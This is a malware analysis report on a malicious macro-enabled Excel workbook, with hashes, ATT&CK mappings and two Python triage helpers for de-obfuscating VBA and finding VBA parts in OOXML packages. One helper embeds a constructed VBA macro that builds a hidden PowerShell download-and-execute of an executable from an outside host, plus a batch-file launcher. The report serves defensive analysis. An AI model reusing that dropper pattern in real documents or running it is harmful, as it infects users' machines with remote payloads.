Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 b087016bd7f2e4a1…

MALICIOUS

Office (OOXML) / .XLSM

Size: 52.2 KB
Created: 2022-01-04 14:07:30 UTC
Authoring application: Microsoft Excel 15.0300
MD5: b82b69824a1423b3b74575f9f3abfce8
SHA-1: f9973cca44a67e6675618c9c727841794b34f550
SHA-256: b087016bd7f2e4a1689771ccd10f3b73ca36c93b42cbf3a559188e5c90b018f4
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1059.001 Command and Scripting Interpreter: PowerShell (the reconstructed download command described below)

The critical heuristic OLE_VBA_SHELL indicates a Shell() call inside the VBA macros. At runtime the macro reconstructs a PowerShell command that downloads 'http://ddl7.data.hu/get/21270/1316926/doga.exe', saves it as 'Euwzls.exe' in the user's AppData directory and then executes it. It also writes a batch file named 'Leqnofqpmogxuxnwtrmql.bat' that launches the same payload through the Windows command shell. The download URL and the two dropped filenames are the indicators to pivot on; because the PowerShell string is assembled at runtime, a plain string search over the document will not find it, and the decoded VBA source (macros.bas below) is the artifact to inspect.
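The paragraph above says the macro assembles its PowerShell command at runtime before handing it to Shell(). The following Python is an added triage helper, not the analyser's OLE_VBA_SHELL heuristic and not code taken from the sample: it walks decoded VBA source (the kind of text olevba emits), folds string concatenations, Chr() and Environ() calls into literal strings, and reports every Shell() call with its de-obfuscated argument plus the URLs, dropped filenames and ATT&CK IDs it implies. The VBA it runs on is constructed to mirror the behaviour described in the report; it is not the carved macros.bas, and the Chr()-based obfuscation and the procedure name are assumptions. T1059.001 (PowerShell) and T1105 (Ingress Tool Transfer) are mappings added here beyond the two techniques the report lists.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed VBA, modelled on the behaviour the report describes. It is NOT the
# macros.bas carved from the sample; the Chr()/concatenation obfuscation and the
# procedure name are assumptions made for this example.
SAMPLE_VBA = r'''
Sub Auto_Open()
    Dim drop As String, bat As String, cmd As String
    drop = Environ("APPDATA") & "\Euw" & Chr(122) & "ls.exe"
    bat = Environ("APPDATA") & "\Leqnofqpmogxuxnwtrmql.bat"
    cmd = "pow" & Chr(101) & "rshell -w hidden (New-Object Net.WebClient).DownloadFile('http://ddl7.data.hu/get/21270/1316926/doga.exe','" & drop & "');Start-Process '" & drop & "'"
    Shell cmd, vbHide
    Shell "cmd /c " & bat, vbHide
End Sub
'''

# One expression token per alternative; the & operator, whitespace and
# parentheses between tokens are simply skipped by finditer/findall.
TOKEN_RE = re.compile(
    r'"((?:[^"]|"")*)"'                 # 1: string literal, "" is an escaped quote
    r'|Chr\$?\(\s*(\d+)\s*\)'           # 2: Chr(n) / Chr$(n)
    r'|Environ\$?\(\s*"([^"]+)"\s*\)'   # 3: Environ("VAR")
    r'|([A-Za-z_]\w*)',                 # 4: reference to an earlier variable
    re.IGNORECASE,
)
ASSIGN_RE = re.compile(r'^(?!Dim\b|Set\b)([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.IGNORECASE)
SHELL_RE = re.compile(r'^Shell\b\s*\(?\s*(.*?)\s*(?:,\s*vb\w+)?\)?\s*$', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s\'"()]+', re.IGNORECASE)
FILE_RE = re.compile(r'[\w%\\.-]+\.(?:exe|bat|cmd|ps1|vbs|dll|scr)\b', re.IGNORECASE)


def resolve(expr: str, env: dict[str, str]) -> str:
    """Fold a VBA expression built from literals, Chr(), Environ() and variables into one string."""
    out = []
    for lit, code, var, name in TOKEN_RE.findall(expr):
        if code:
            out.append(chr(int(code)))
        elif var:
            out.append(f"%{var.upper()}%")          # keep symbolic; never expand the analyst's own environment
        elif name:
            out.append(env.get(name, f"<{name}>"))  # unknown variable: leave a visible placeholder
        else:
            out.append(lit.replace('""', '"'))
    return "".join(out)


@dataclass
class Triage:
    commands: list[str] = field(default_factory=list)  # resolved Shell() arguments
    urls: list[str] = field(default_factory=list)
    files: list[str] = field(default_factory=list)
    techniques: set[str] = field(default_factory=set)


def triage_vba(source: str) -> Triage:
    """Track string variables line by line and report every Shell() call with its de-obfuscated argument."""
    env: dict[str, str] = {}
    t = Triage()
    for raw in source.splitlines():
        line = raw.strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue
        if m := SHELL_RE.match(line):
            cmd = resolve(m.group(1), env)
            low = cmd.lower()
            t.commands.append(cmd)
            t.techniques.add("T1059.005")                 # Visual Basic: Shell() from a macro
            if low.startswith("cmd") or ".bat" in low:
                t.techniques.add("T1059.003")             # Windows Command Shell
            if "powershell" in low:
                t.techniques.add("T1059.001")             # PowerShell
            if "downloadfile" in low or "downloadstring" in low:
                t.techniques.add("T1105")                 # Ingress Tool Transfer
            t.urls.extend(URL_RE.findall(cmd))
            t.files.extend(FILE_RE.findall(cmd))
        elif m := ASSIGN_RE.match(line):
            env[m.group(1)] = resolve(m.group(2), env)
    t.urls = list(dict.fromkeys(t.urls))    # de-duplicate, keep first-seen order
    t.files = list(dict.fromkeys(t.files))
    return t


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    for c in result.commands:
        print("Shell():", c)
    print("URLs:", result.urls)
    print("Files:", result.files)
    print("ATT&CK:", sorted(result.techniques))
```

Nothing here executes the macro: the script only folds constant expressions, which is why Environ("APPDATA") stays as the symbolic %APPDATA% instead of the analyst's own profile path leaking into the IOC list. Real samples add tricks this does not handle (Mid()/StrReverse(), arrays of character codes, values pulled from cell contents or document properties), so treat an unresolved `<name>` placeholder in the output as a cue to read that part of macros.bas by hand.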

Heuristics (2)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OOXML_VBA (medium): document contains xl/vbaProject.bin, so VBA macros are present
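The OOXML_VBA heuristic fires on the presence of a vbaProject.bin part in the package. The Python below is an added example of that container-level check, not the analyser's own implementation: it opens an OOXML package as the zip it is, lists every VBA project part it finds by name or by declared content type, and records two things a practitioner wants to know before trusting the result, whether [Content_Types].xml actually declares the part as a VBA project and whether the part starts with the OLE compound-file header every real vbaProject.bin has. The package it scans is constructed in memory with a stub vbaProject.bin, so it does not reproduce the analysed sample.

```python
from __future__ import annotations

import io
import xml.etree.ElementTree as ET
import zipfile
from dataclasses import dataclass

# Every vbaProject.bin is an OLE compound file and starts with this 8-byte header.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


@dataclass
class VbaPart:
    name: str
    size: int
    declared: bool    # [Content_Types].xml maps this part to the vbaProject content type
    ole_header: bool  # the part really begins with the compound-file magic


def _declared_vba_parts(z: zipfile.ZipFile) -> set[str]:
    """Part names that [Content_Types].xml types as a VBA project (Default by extension, Override by name)."""
    if "[Content_Types].xml" not in z.namelist():
        return set()
    root = ET.fromstring(z.read("[Content_Types].xml"))
    exts: set[str] = set()
    names: set[str] = set()
    for el in root.iter():
        if el.get("ContentType") != VBA_CONTENT_TYPE:
            continue
        if el.tag.endswith("Default"):
            exts.add(el.get("Extension", "").lower())
        elif el.tag.endswith("Override"):
            names.add(el.get("PartName", "").lstrip("/"))
    return {n for n in z.namelist() if n in names or n.rsplit(".", 1)[-1].lower() in exts}


def find_vba_parts(package: bytes) -> list[VbaPart]:
    """List every VBA project part, whether it is found by its name or by its declared content type."""
    found: list[VbaPart] = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        declared = _declared_vba_parts(z)
        for info in z.infolist():
            if info.filename.lower().endswith("vbaproject.bin") or info.filename in declared:
                with z.open(info) as fh:
                    head = fh.read(len(OLE_MAGIC))
                found.append(VbaPart(info.filename, info.file_size,
                                     info.filename in declared, head == OLE_MAGIC))
    return found


def build_sample(declare: bool, real_header: bool) -> bytes:
    """Constructed minimal .xlsm-like package (not the analysed sample); vbaProject.bin is a 512-byte stub."""
    default_bin = f'<Default Extension="bin" ContentType="{VBA_CONTENT_TYPE}"/>' if declare else ""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f'{default_bin}'
        '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
        '</Types>'
    )
    header = OLE_MAGIC if real_header else b"PK\x03\x04"   # a zip header where an OLE file should be
    stub = header + b"\x00" * (512 - len(header))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml",
                   '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"/>')
        z.writestr("xl/vbaProject.bin", stub)
    return buf.getvalue()


if __name__ == "__main__":
    for p in find_vba_parts(build_sample(declare=True, real_header=True)):
        print(f"{p.name}: {p.size} bytes, declared={p.declared}, ole_header={p.ole_header}")
```

A part named vbaProject.bin that is not declared in [Content_Types].xml, or that lacks the OLE header, is still worth carving (it is what an analyst would hash and feed to olevba, as the report did for vbaProject_00.bin), but it should be reported as an anomaly rather than silently treated as a normal macro-enabled workbook.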

Extracted artifacts (2)

Files carved from inside the sample during analysis.

macros.bas
  Kind:    vba-macro
  Source:  oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size:    2320 bytes
  SHA-256: 4bb26084347e8606d2b23d7ed53b80342d1c160c02ed01c0ef8cccba62d9b31a

vbaProject_00.bin
  Kind:    vba-project
  Source:  OOXML VBA project: xl/vbaProject.bin
  Size:    6144 bytes
  SHA-256: ff349aa8dc571b7cd1a2318493e8d70c8c52c01121b4eba7836d7dfbd0830939